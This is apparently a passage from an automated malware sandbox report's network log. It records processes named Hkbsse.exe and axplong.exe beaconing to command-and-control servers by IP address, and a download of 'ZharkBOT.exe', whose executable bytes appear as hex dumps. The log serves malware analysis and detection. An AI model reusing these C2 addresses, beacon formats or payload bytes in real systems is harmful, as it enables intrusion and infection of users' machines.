                                                                                                                                                                                                                                        Data Ascii: ^"av2TwuA|BJT#~R,c}-dfn4%YF"WcPRQy4.jbN!_u6GSqQh[/7z^~db<T()4- `FEz4!'&85y/{s#~8~_&cqx++JTw/pa5/. ~py.ZSR*M36
                                                                                                                                                                                                                                        Jul 13, 2024 07:09:01.885936975 CEST1236INData Raw: 6a fd b3 82 ac 75 0a 8f 26 17 21 b7 9f 74 67 42 a4 58 98 0d 62 a4 c7 70 04 37 b5 63 41 33 db 31 02 18 7c d5 18 67 20 38 ff 5c bc d8 27 5a 69 4e 85 3d 5c 0b 6b f3 bc 23 57 48 2a 5c 04 96 44 f4 54 e8 a6 6b 48 92 c1 13 10 fb 58 58 6d 65 c6 53 a9 43
                                                                                                                                                                                                                                        Data Ascii: ju&!tgBXbp7cA31|g 8\'ZiN=\k#WH*\DTkHXXmeSCSlF<m72aGF7>df/Cg;]^vYMLUB!PZ%Z}1*vVa~wcG#.m|tJ#]{
                                                                                                                                                                                                                                        Jul 13, 2024 07:09:01.891611099 CEST1236INData Raw: 83 c1 60 d2 30 cb 84 d9 0b 48 06 38 3a 8b 2d 54 ed 02 e4 ce 88 10 cd f5 99 b3 f9 87 4a d9 d5 f6 46 89 e5 79 7e fb 67 6b d6 05 16 bb 99 57 00 bb 2e 3b c8 a8 06 47 07 7f b2 08 99 f2 ab df ac 50 b1 f1 98 55 ec 13 f8 d6 67 38 06 d0 01 f3 66 f8 97 77
                                                                                                                                                                                                                                        Data Ascii: `0H8:-TJFy~gkW.;GPUg8fw434&zYr;;~V_K+?*I& ;"i\F_E@p',CA,d<,K"<IA"xl4Sa%|:jWL+)-n


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        138192.168.2.559114185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:09:01.393424988 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:09:02.418622017 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:09:01 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:09:02.418680906 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:09:01 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        139192.168.2.559115185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:09:02.435219049 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:09:03.090693951 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:09:02 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        140192.168.2.559116185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:09:03.208720922 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:09:03.861663103 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:09:03 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        141192.168.2.55911777.91.77.81806360C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:09:03.257088900 CEST180OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 77.91.77.81
                                                                                                                                                                                                                                        Content-Length: 31
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 64 31 3d 31 30 30 30 32 34 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                        Data Ascii: d1=1000241001&unit=246122658369
                                                                                                                                                                                                                                        Jul 13, 2024 07:09:03.962102890 CEST193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:09:03 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 4 <c>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        142192.168.2.559118185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:09:03.871479034 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:09:04.544774055 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:09:04 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        143192.168.2.55911977.232.41.110806360C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:09:03.974349022 CEST57OUTGET /large/ZharkBOT.exe HTTP/1.1
                                                                                                                                                                                                                                        Host: 77.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:09:04.684490919 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:09:04 GMT
                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                        Content-Length: 922112
                                                                                                                                                                                                                                        Last-Modified: Fri, 12 Jul 2024 08:46:23 GMT
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        ETag: "6690ed5f-e1200"
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 85 f4 5a 70 c1 95 34 23 c1 95 34 23 c1 95 34 23 12 e7 37 22 cc 95 34 23 12 e7 31 22 70 95 34 23 12 e7 30 22 d6 95 34 23 93 e0 30 22 d0 95 34 23 93 e0 37 22 d6 95 34 23 93 e0 31 22 95 95 34 23 12 e7 35 22 d0 95 34 23 c1 95 35 23 1e 95 34 23 09 e0 30 22 c0 95 34 23 09 e0 31 22 c8 95 34 23 09 e0 36 22 c0 95 34 23 52 69 63 68 c1 95 34 23 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 57 ed 90 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 f0 0b 00 00 32 02 00 00 00 00 00 68 11 0a 00 00 10 00 00 00 00 0c 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 [TRUNCATED]
                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$Zp4#4#4#7"4#1"p4#0"4#0"4#7"4#1"4#5"4#5#4#0"4#1"4#6"4#Rich4#PELWf2h@P@gZ8[@.text `.rdata@@.data07$@.relocgh@B
                                                                                                                                                                                                                                        Jul 13, 2024 07:09:04.684528112 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 38 c7 4d 00 e8 5d e1 09 00 68 cc fe 4b 00 e8 9a 03 0a 00 59 c3 68 e0 fe 4b 00
                                                                                                                                                                                                                                        Data Ascii: 8M]hKYhKYhKYjjh`MMhKcYVWjDY`MjV`ML7hK+Y_^M4MhKYMhKY
                                                                                                                                                                                                                                        Jul 13, 2024 07:09:04.684544086 CEST1236INData Raw: e8 6e 04 00 00 83 c4 08 83 78 14 10 8b 50 10 72 02 8b 00 83 7d f8 10 8d 4d e4 57 0f 43 4d e4 bb 01 00 00 00 52 50 6a 00 ff 75 f4 51 e8 02 fc ff ff 83 c4 14 83 f8 ff 0f 85 51 02 00 00 8d 45 b0 68 98 03 4c 00 50 e8 28 04 00 00 83 c4 08 83 78 14 10
                                                                                                                                                                                                                                        Data Ascii: nxPr}MWCMRPjuQQEhLP(xPr}MRCMPjuQEhLPxPr}MuCMRPjVQwE]MCF+PjwS
                                                                                                                                                                                                                                        Jul 13, 2024 07:09:04.684554100 CEST624INData Raw: 00 8d 45 d0 c7 45 e4 0f 00 00 00 8d 4f 02 8b 75 08 0f 10 00 0f 11 06 f3 0f 7e 40 10 66 0f d6 46 10 c7 40 10 00 00 00 00 c7 40 14 0f 00 00 00 c6 00 00 85 c9 74 30 8b 55 e4 83 fa 10 72 28 8b 4d d0 42 8b c1 81 fa 00 10 00 00 72 10 8b 49 fc 83 c2 23
                                                                                                                                                                                                                                        Data Ascii: EEOu~@fF@@t0Ur(MBrI#+wFRQt0Ur(MBrI#+wRQ_^]77I<LEUuEPfC]U@SVW3MS]-
                                                                                                                                                                                                                                        Jul 13, 2024 07:09:04.684564114 CEST1236INData Raw: 73 10 8b 41 08 8b 34 b8 85 f6 0f 85 b7 00 00 00 eb 02 33 f6 38 59 14 74 10 e8 e9 d7 09 00 3b 78 0c 73 0e 8b 40 08 8b 34 b8 85 f6 0f 85 96 00 00 00 8b 45 f8 85 c0 74 13 8d 4d f4 8b f0 e8 c9 d5 09 00 5f 8b c6 5e 5b 8b e5 5d c3 6a 18 e8 7b ea 09 00
                                                                                                                                                                                                                                        Data Ascii: sA438Yt;xs@4EtM_^[]j{tGEHtAuALPME^P|LF3tM^V$R5MM<_^[]U$}SV]t2
                                                                                                                                                                                                                                        Jul 13, 2024 07:09:04.684653044 CEST176INData Raw: 00 85 c0 74 11 50 56 e8 2d d4 09 00 83 c4 08 8b c6 5e 5d c2 04 00 68 68 04 4c 00 e8 72 d0 09 00 cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 50 53 56 57 8b 7d 10 8b d9 83 7f 14 10 8b 47 10 89 45 10 72 02 8b 3f 83 f8 10 73 1d 8b 75 0c 89 45 f0
                                                                                                                                                                                                                                        Data Ascii: tPV-^]hhLrUPSVW}GEr?suEE}EtM<M;GFPMAEQWPE}uuEjhLM
                                                                                                                                                                                                                                        Jul 13, 2024 07:09:04.684662104 CEST1236INData Raw: 27 10 00 00 8b 06 8d 4d c8 57 51 8b ce ff 50 08 83 7d dc 10 8d 45 c8 ff 75 d8 0f 43 45 c8 8d 4d e0 50 e8 04 10 00 00 8b 55 dc 83 fa 10 72 2c 8b 4d c8 42 8b c1 81 fa 00 10 00 00 72 14 8b 49 fc 83 c2 23 2b c1 83 c0 fc 83 f8 1f 0f 87 a2 00 00 00 52
                                                                                                                                                                                                                                        Data Ascii: 'MWQP}EuCEMPUr,MBrI#+RQ!MM}~Ef~fEW4LCfCCMPEEPMLULr(MBrI#+w,RQEM_C^LK[]
                                                                                                                                                                                                                                        Jul 13, 2024 07:09:04.684670925 CEST1236INData Raw: 04 c7 46 1c 00 00 00 00 8b 46 14 85 c0 74 09 50 e8 f0 2d 0a 00 83 c4 04 c7 46 14 00 00 00 00 8b 46 0c 85 c0 74 09 50 e8 d9 2d 0a 00 83 c4 04 c7 46 0c 00 00 00 00 8b 46 04 85 c0 74 09 50 e8 c2 2d 0a 00 83 c4 04 c7 46 04 00 00 00 00 8b ce 5e e9 5e
                                                                                                                                                                                                                                        Data Ascii: FFtP-FFtP-FFtP-F^^Vqh@D0LFHAD1NFV@D0LLFHAD1L^+Iv+IUVuEtjXV^]
                                                                                                                                                                                                                                        Jul 13, 2024 07:09:04.684746027 CEST448INData Raw: 4c 00 66 0f fd c8 f3 0f 7e 44 4d b0 66 0f ef c8 66 0f d6 4c 4d b0 83 c1 08 83 f9 18 0f 8c 11 ff ff ff 83 f9 1e 7d 28 b8 09 cb 3d 8d f7 e9 03 d1 c1 fa 05 8b c2 c1 e8 1f 03 c2 8b d1 6b c0 3a 2b d0 83 c2 33 66 31 54 4d a8 41 83 f9 1e 7c d8 8d 4d a8
                                                                                                                                                                                                                                        Data Ascii: Lf~DMffLM}(=k:+3f1TMA|MEEQEffu+EWQPM\}EjCEjjjPLUr2MUrI#+RQ3EEfE
                                                                                                                                                                                                                                        Jul 13, 2024 07:09:04.684755087 CEST1236INData Raw: de ff ff 50 56 ff d3 85 c0 74 33 8b 45 fc 85 c0 74 2c 6a 00 50 8d 85 f0 de ff ff 50 8d 8d f0 fe ff ff e8 fc 13 00 00 8d 45 fc 50 68 00 20 00 00 8d 85 f0 de ff ff 50 56 ff d3 85 c0 75 cd 8d 8d f4 fe ff ff e8 6a 07 00 00 5b 85 c0 75 39 8b 85 f0 fe
                                                                                                                                                                                                                                        Data Ascii: PVt3Et,jPPEPh PVuj[u93H9(E#u&V5LW3#^_]#tLLLDEjPMPVbh`rMEP
                                                                                                                                                                                                                                        Jul 13, 2024 07:09:04.690160990 CEST1236INData Raw: 8b c2 8b 77 10 2b c6 89 75 f4 89 55 fc 3b d8 77 2d 8d 04 1e 89 47 10 8b c7 83 fa 10 72 02 8b 07 53 ff 75 08 03 f0 56 e8 23 ea 09 00 83 c4 0c c6 04 1e 00 8b c7 5f 5e 5b 8b e5 5d c2 08 00 b8 ff ff ff 7f 2b c6 3b c3 0f 82 ed 00 00 00 8d 0c 1e 83 c9
                                                                                                                                                                                                                                        Data Ascii: w+uU;w-GrSuV#_^[]+;v$E+E;vE;BAMPEOMO0M}MrYu7VPSuuEMArV#+FwN


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        144192.168.2.559120185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:09:04.660130024 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:09:05.314975023 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:09:05 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        145192.168.2.559121185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:09:05.326070070 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:09:05.970479012 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:09:05 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        146192.168.2.559122185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:09:06.083504915 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:09:06.744210005 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:09:06 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        147192.168.2.55912377.91.77.81806360C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:09:06.467300892 CEST180OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 77.91.77.81
                                                                                                                                                                                                                                        Content-Length: 31
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 64 31 3d 31 30 30 30 32 34 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                        Data Ascii: d1=1000243001&unit=246122658369
                                                                                                                                                                                                                                        Jul 13, 2024 07:09:07.178098917 CEST193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:09:07 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 4 <c>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        148192.168.2.559124185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:09:06.756467104 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:09:07.431977987 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:09:07 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        149192.168.2.55912577.91.77.81806360C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:09:07.300381899 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 77.91.77.81
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
